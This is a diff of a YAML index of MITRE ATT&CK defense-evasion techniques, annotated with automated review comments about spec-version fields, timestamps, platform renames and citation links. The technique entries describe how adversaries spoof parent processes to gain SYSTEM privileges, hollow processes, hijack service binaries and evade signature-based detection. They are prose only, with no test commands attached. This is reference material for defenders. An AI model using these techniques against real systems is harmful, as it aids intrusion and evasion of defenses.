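Review bot: `spec_version: '2.1'` is removed from every object this patch touches, here and in each later hunk, while `x_mitre_attack_spec_version` is raised from 2.1.0 to 3.2.0; if the index is now generated from a source that omits the STIX `spec_version`, say so in the commit message, since anything downstream that filters objects on `spec_version` will silently stop matching. Separately, the new `Deloitte Environment Awareness` reference points at `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`, a Drive share rather than a published URL; it can be revoked or require sign-in, so an archived copy would make the citation more durable.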
@@ -8736,7 +8838,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
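Review bot: the `modified` timestamp moves backwards here, from `'2022-05-24T14:00:00.188Z'` to `'2022-05-03T02:15:42.360Z'`, and the same happens in most later hunks (for example 2022-11-08 to 2022-07-07 for VDSO Hijacking and 2021-04-29 to 2020-10-22 for ROMMONkit). The old values share the suffix `14:00:00.188Z` or `14:49:39.188Z` across many unrelated objects, which suggests they were stamped at generation time rather than taken from upstream; if the new values are the upstream STIX `modified` fields, that is the right fix, but a sentence in the commit message saying so would stop readers taking the change for a regression.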
@@ -8761,7 +8863,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
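Review bot: this hunk removes `x_mitre_attack_spec_version: 2.1.0` from the KernelCallbackTable object with no replacement in the visible lines, whereas other objects in this patch have the field bumped to 3.2.0 rather than dropped. The same remove-without-replace pattern appears for ROMMONkit, Modify System Image, Invalid Code Signature, Run Virtual Instance, SID-History Injection, and Regsvcs/Regasm. Please confirm the field is still set earlier in each of those objects, outside the hunk context; if it is not, these entries end up with no ATT&CK spec version while the rest of the file moves to 3.2.0.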
@@ -9006,7 +9103,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests: []
T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Indicator Removal from Tools
x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
- Signature-based detection
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
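Review bot: the platform list for Valid Accounts drops `Azure AD`, `Office 365`, and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (the same rename is applied to Multi-Factor Authentication and Web Session Cookie further down). Any tooling in this repo that groups techniques by `x_mitre_platforms` value will need a mapping from the old names to the new ones, otherwise techniques now tagged only `Office Suite` or `Identity Provider` drop out of the older per-platform groupings. The version bump to `'2.7'` alongside the rename is consistent with the content change.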
@@ -9583,11 +9668,12 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1564.009:
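Review bot: the `Leitch Hollowing` reference is re-pointed from `http://www.autosectools.com/process-hollowing.pdf` to `https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`, a third-party upload rather than the author's original host. It is worth confirming the mirrored PDF is the same paper and, since it sits in a WordPress uploads directory, pairing it with an archived copy so the citation survives the next site reorganisation.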
@@ -9713,7 +9798,7 @@ defense-evasion:
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@
or xattr -l
commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources
folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:10:23.890Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Resource Forking
x_mitre_detection: "Identify files with the com.apple.ResourceFork
@@ -9735,7 +9820,6 @@ defense-evasion:
- Gatekeeper
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027:
technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
- 'Script: Script Execution'
- 'File: File Creation'
- 'Module: Module Load'
+ - 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'File: File Metadata'
- 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1027
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.001:
technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-02-10T19:52:47.724Z'
name: Invalid Code Signature
description: |-
Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.006:
technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
- Using virtual machines to persist and evade detections. Retrieved September
22, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T22:21:59.708Z'
name: Run Virtual Instance
description: |-
Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.006
atomic_tests: []
+ T1027.014:
+ technique:
+ modified: '2024-10-09T18:56:28.092Z'
+ name: Polymorphic Code
+ description: "Adversaries may utilize polymorphic code (also known as metamorphic
+ or mutating code) to evade detection. Polymorphic code is a type of software
+ capable of changing its runtime footprint during code execution.(Citation:
+ polymorphic-blackberry) With each execution of the software, the code is mutated
+ into a different version of itself that achieves the same purpose or objective
+ as the original. This functionality enables the malware to evade traditional
+ signature-based defenses, such as antivirus and antimalware tools.(Citation:
+ polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+ with polymorphic code to accomplish the intended effects, including using
+ mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+ [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+ File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+ polymorphic-medium)\n"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+ - TruKno
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ - 'File: File Creation'
+ - 'File: File Metadata'
+ x_mitre_defense_bypassed:
+ - Signature-based Detection
+ type: attack-pattern
+ id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+ created: '2024-09-27T12:28:03.938Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1027/014
+ external_id: T1027.014
+ - source_name: polymorphic-blackberry
+ description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+ 27, 2024.
+ url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+ - source_name: polymorphic-sentinelone
+ description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+ and Challenges. Retrieved September 27, 2024.
+ url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+ - source_name: polymorphic-medium
+ description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+ Retrieved September 27, 2024.'
+ url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+ - source_name: polymorphic-linkedin
+ description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+ and hindering analysis: Packing up and unpacking stuff. Retrieved September
+ 27, 2024.'
+ url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1134.005:
technique:
x_mitre_platforms:
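Review bot: the new T1027.014 object lists `x_mitre_defense_bypassed` as `Signature-based Detection`, while T1497.002 earlier in this patch uses `Signature-based detection` (lowercase d). If anything groups or filters on that value the two spellings will be treated as different bypasses; worth normalising the casing or confirming it matches the upstream source verbatim. The object otherwise follows the key order used for T1497.002 (`type`/`id`/`created` after the `x_mitre_` fields) and ships with `x_mitre_detection: ''` and `atomic_tests: []`, as expected for a newly added technique with no tests yet.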
@@ -10128,7 +10277,7 @@ defense-evasion:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:05:44.200Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Boundary Bridging
x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
- System Access Controls
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1553:
technique:
@@ -10299,11 +10445,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -10383,11 +10528,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:24:56.148Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
@@ -10452,12 +10596,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.010
atomic_tests: []
T1036.003:
technique:
- modified: '2023-09-14T21:12:48.411Z'
+ modified: '2024-09-12T19:30:45.065Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate system utilities to try to evade
security mechanisms concerning the usage of those utilities. Security monitoring
@@ -10506,8 +10649,8 @@ defense-evasion:
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
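Review bot: the `Twitter ItsReallyNick Masquerading Update` reference now points at `https://x.com/ItsReallyNick/status/1055321652777619457` with the retrieval date moved to September 12, 2024; the status id is unchanged, so this is a host rename only. Since individual posts on that platform are frequently deleted or made private, consider keeping an archived copy alongside the live URL.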
@@ -10522,14 +10665,13 @@ defense-evasion:
url: https://lolbas-project.github.io/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.003
atomic_tests: []
T1562.011:
technique:
- modified: '2023-04-12T22:46:33.995Z'
+ modified: '2024-10-16T20:12:44.962Z'
name: Spoof Security Alerting
description: |-
Adversaries may spoof security alerting from tools, presenting false evidence to impair defenders’ awareness of malicious activity.(Citation: BlackBasta) Messages produced by defensive tools contain information about potential security events as well as the functioning status of security software and the system. Security reporting messages are important for monitoring the normal operation of a system and identifying important events that can signal a security incident.
@@ -10541,7 +10683,7 @@ defense-evasion:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -10571,13 +10713,12 @@ defense-evasion:
url: https://www.sentinelone.com/labs/black-basta-ransomware-attacks-deploy-custom-edr-evasion-tools-tied-to-fin7-threat-actor/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
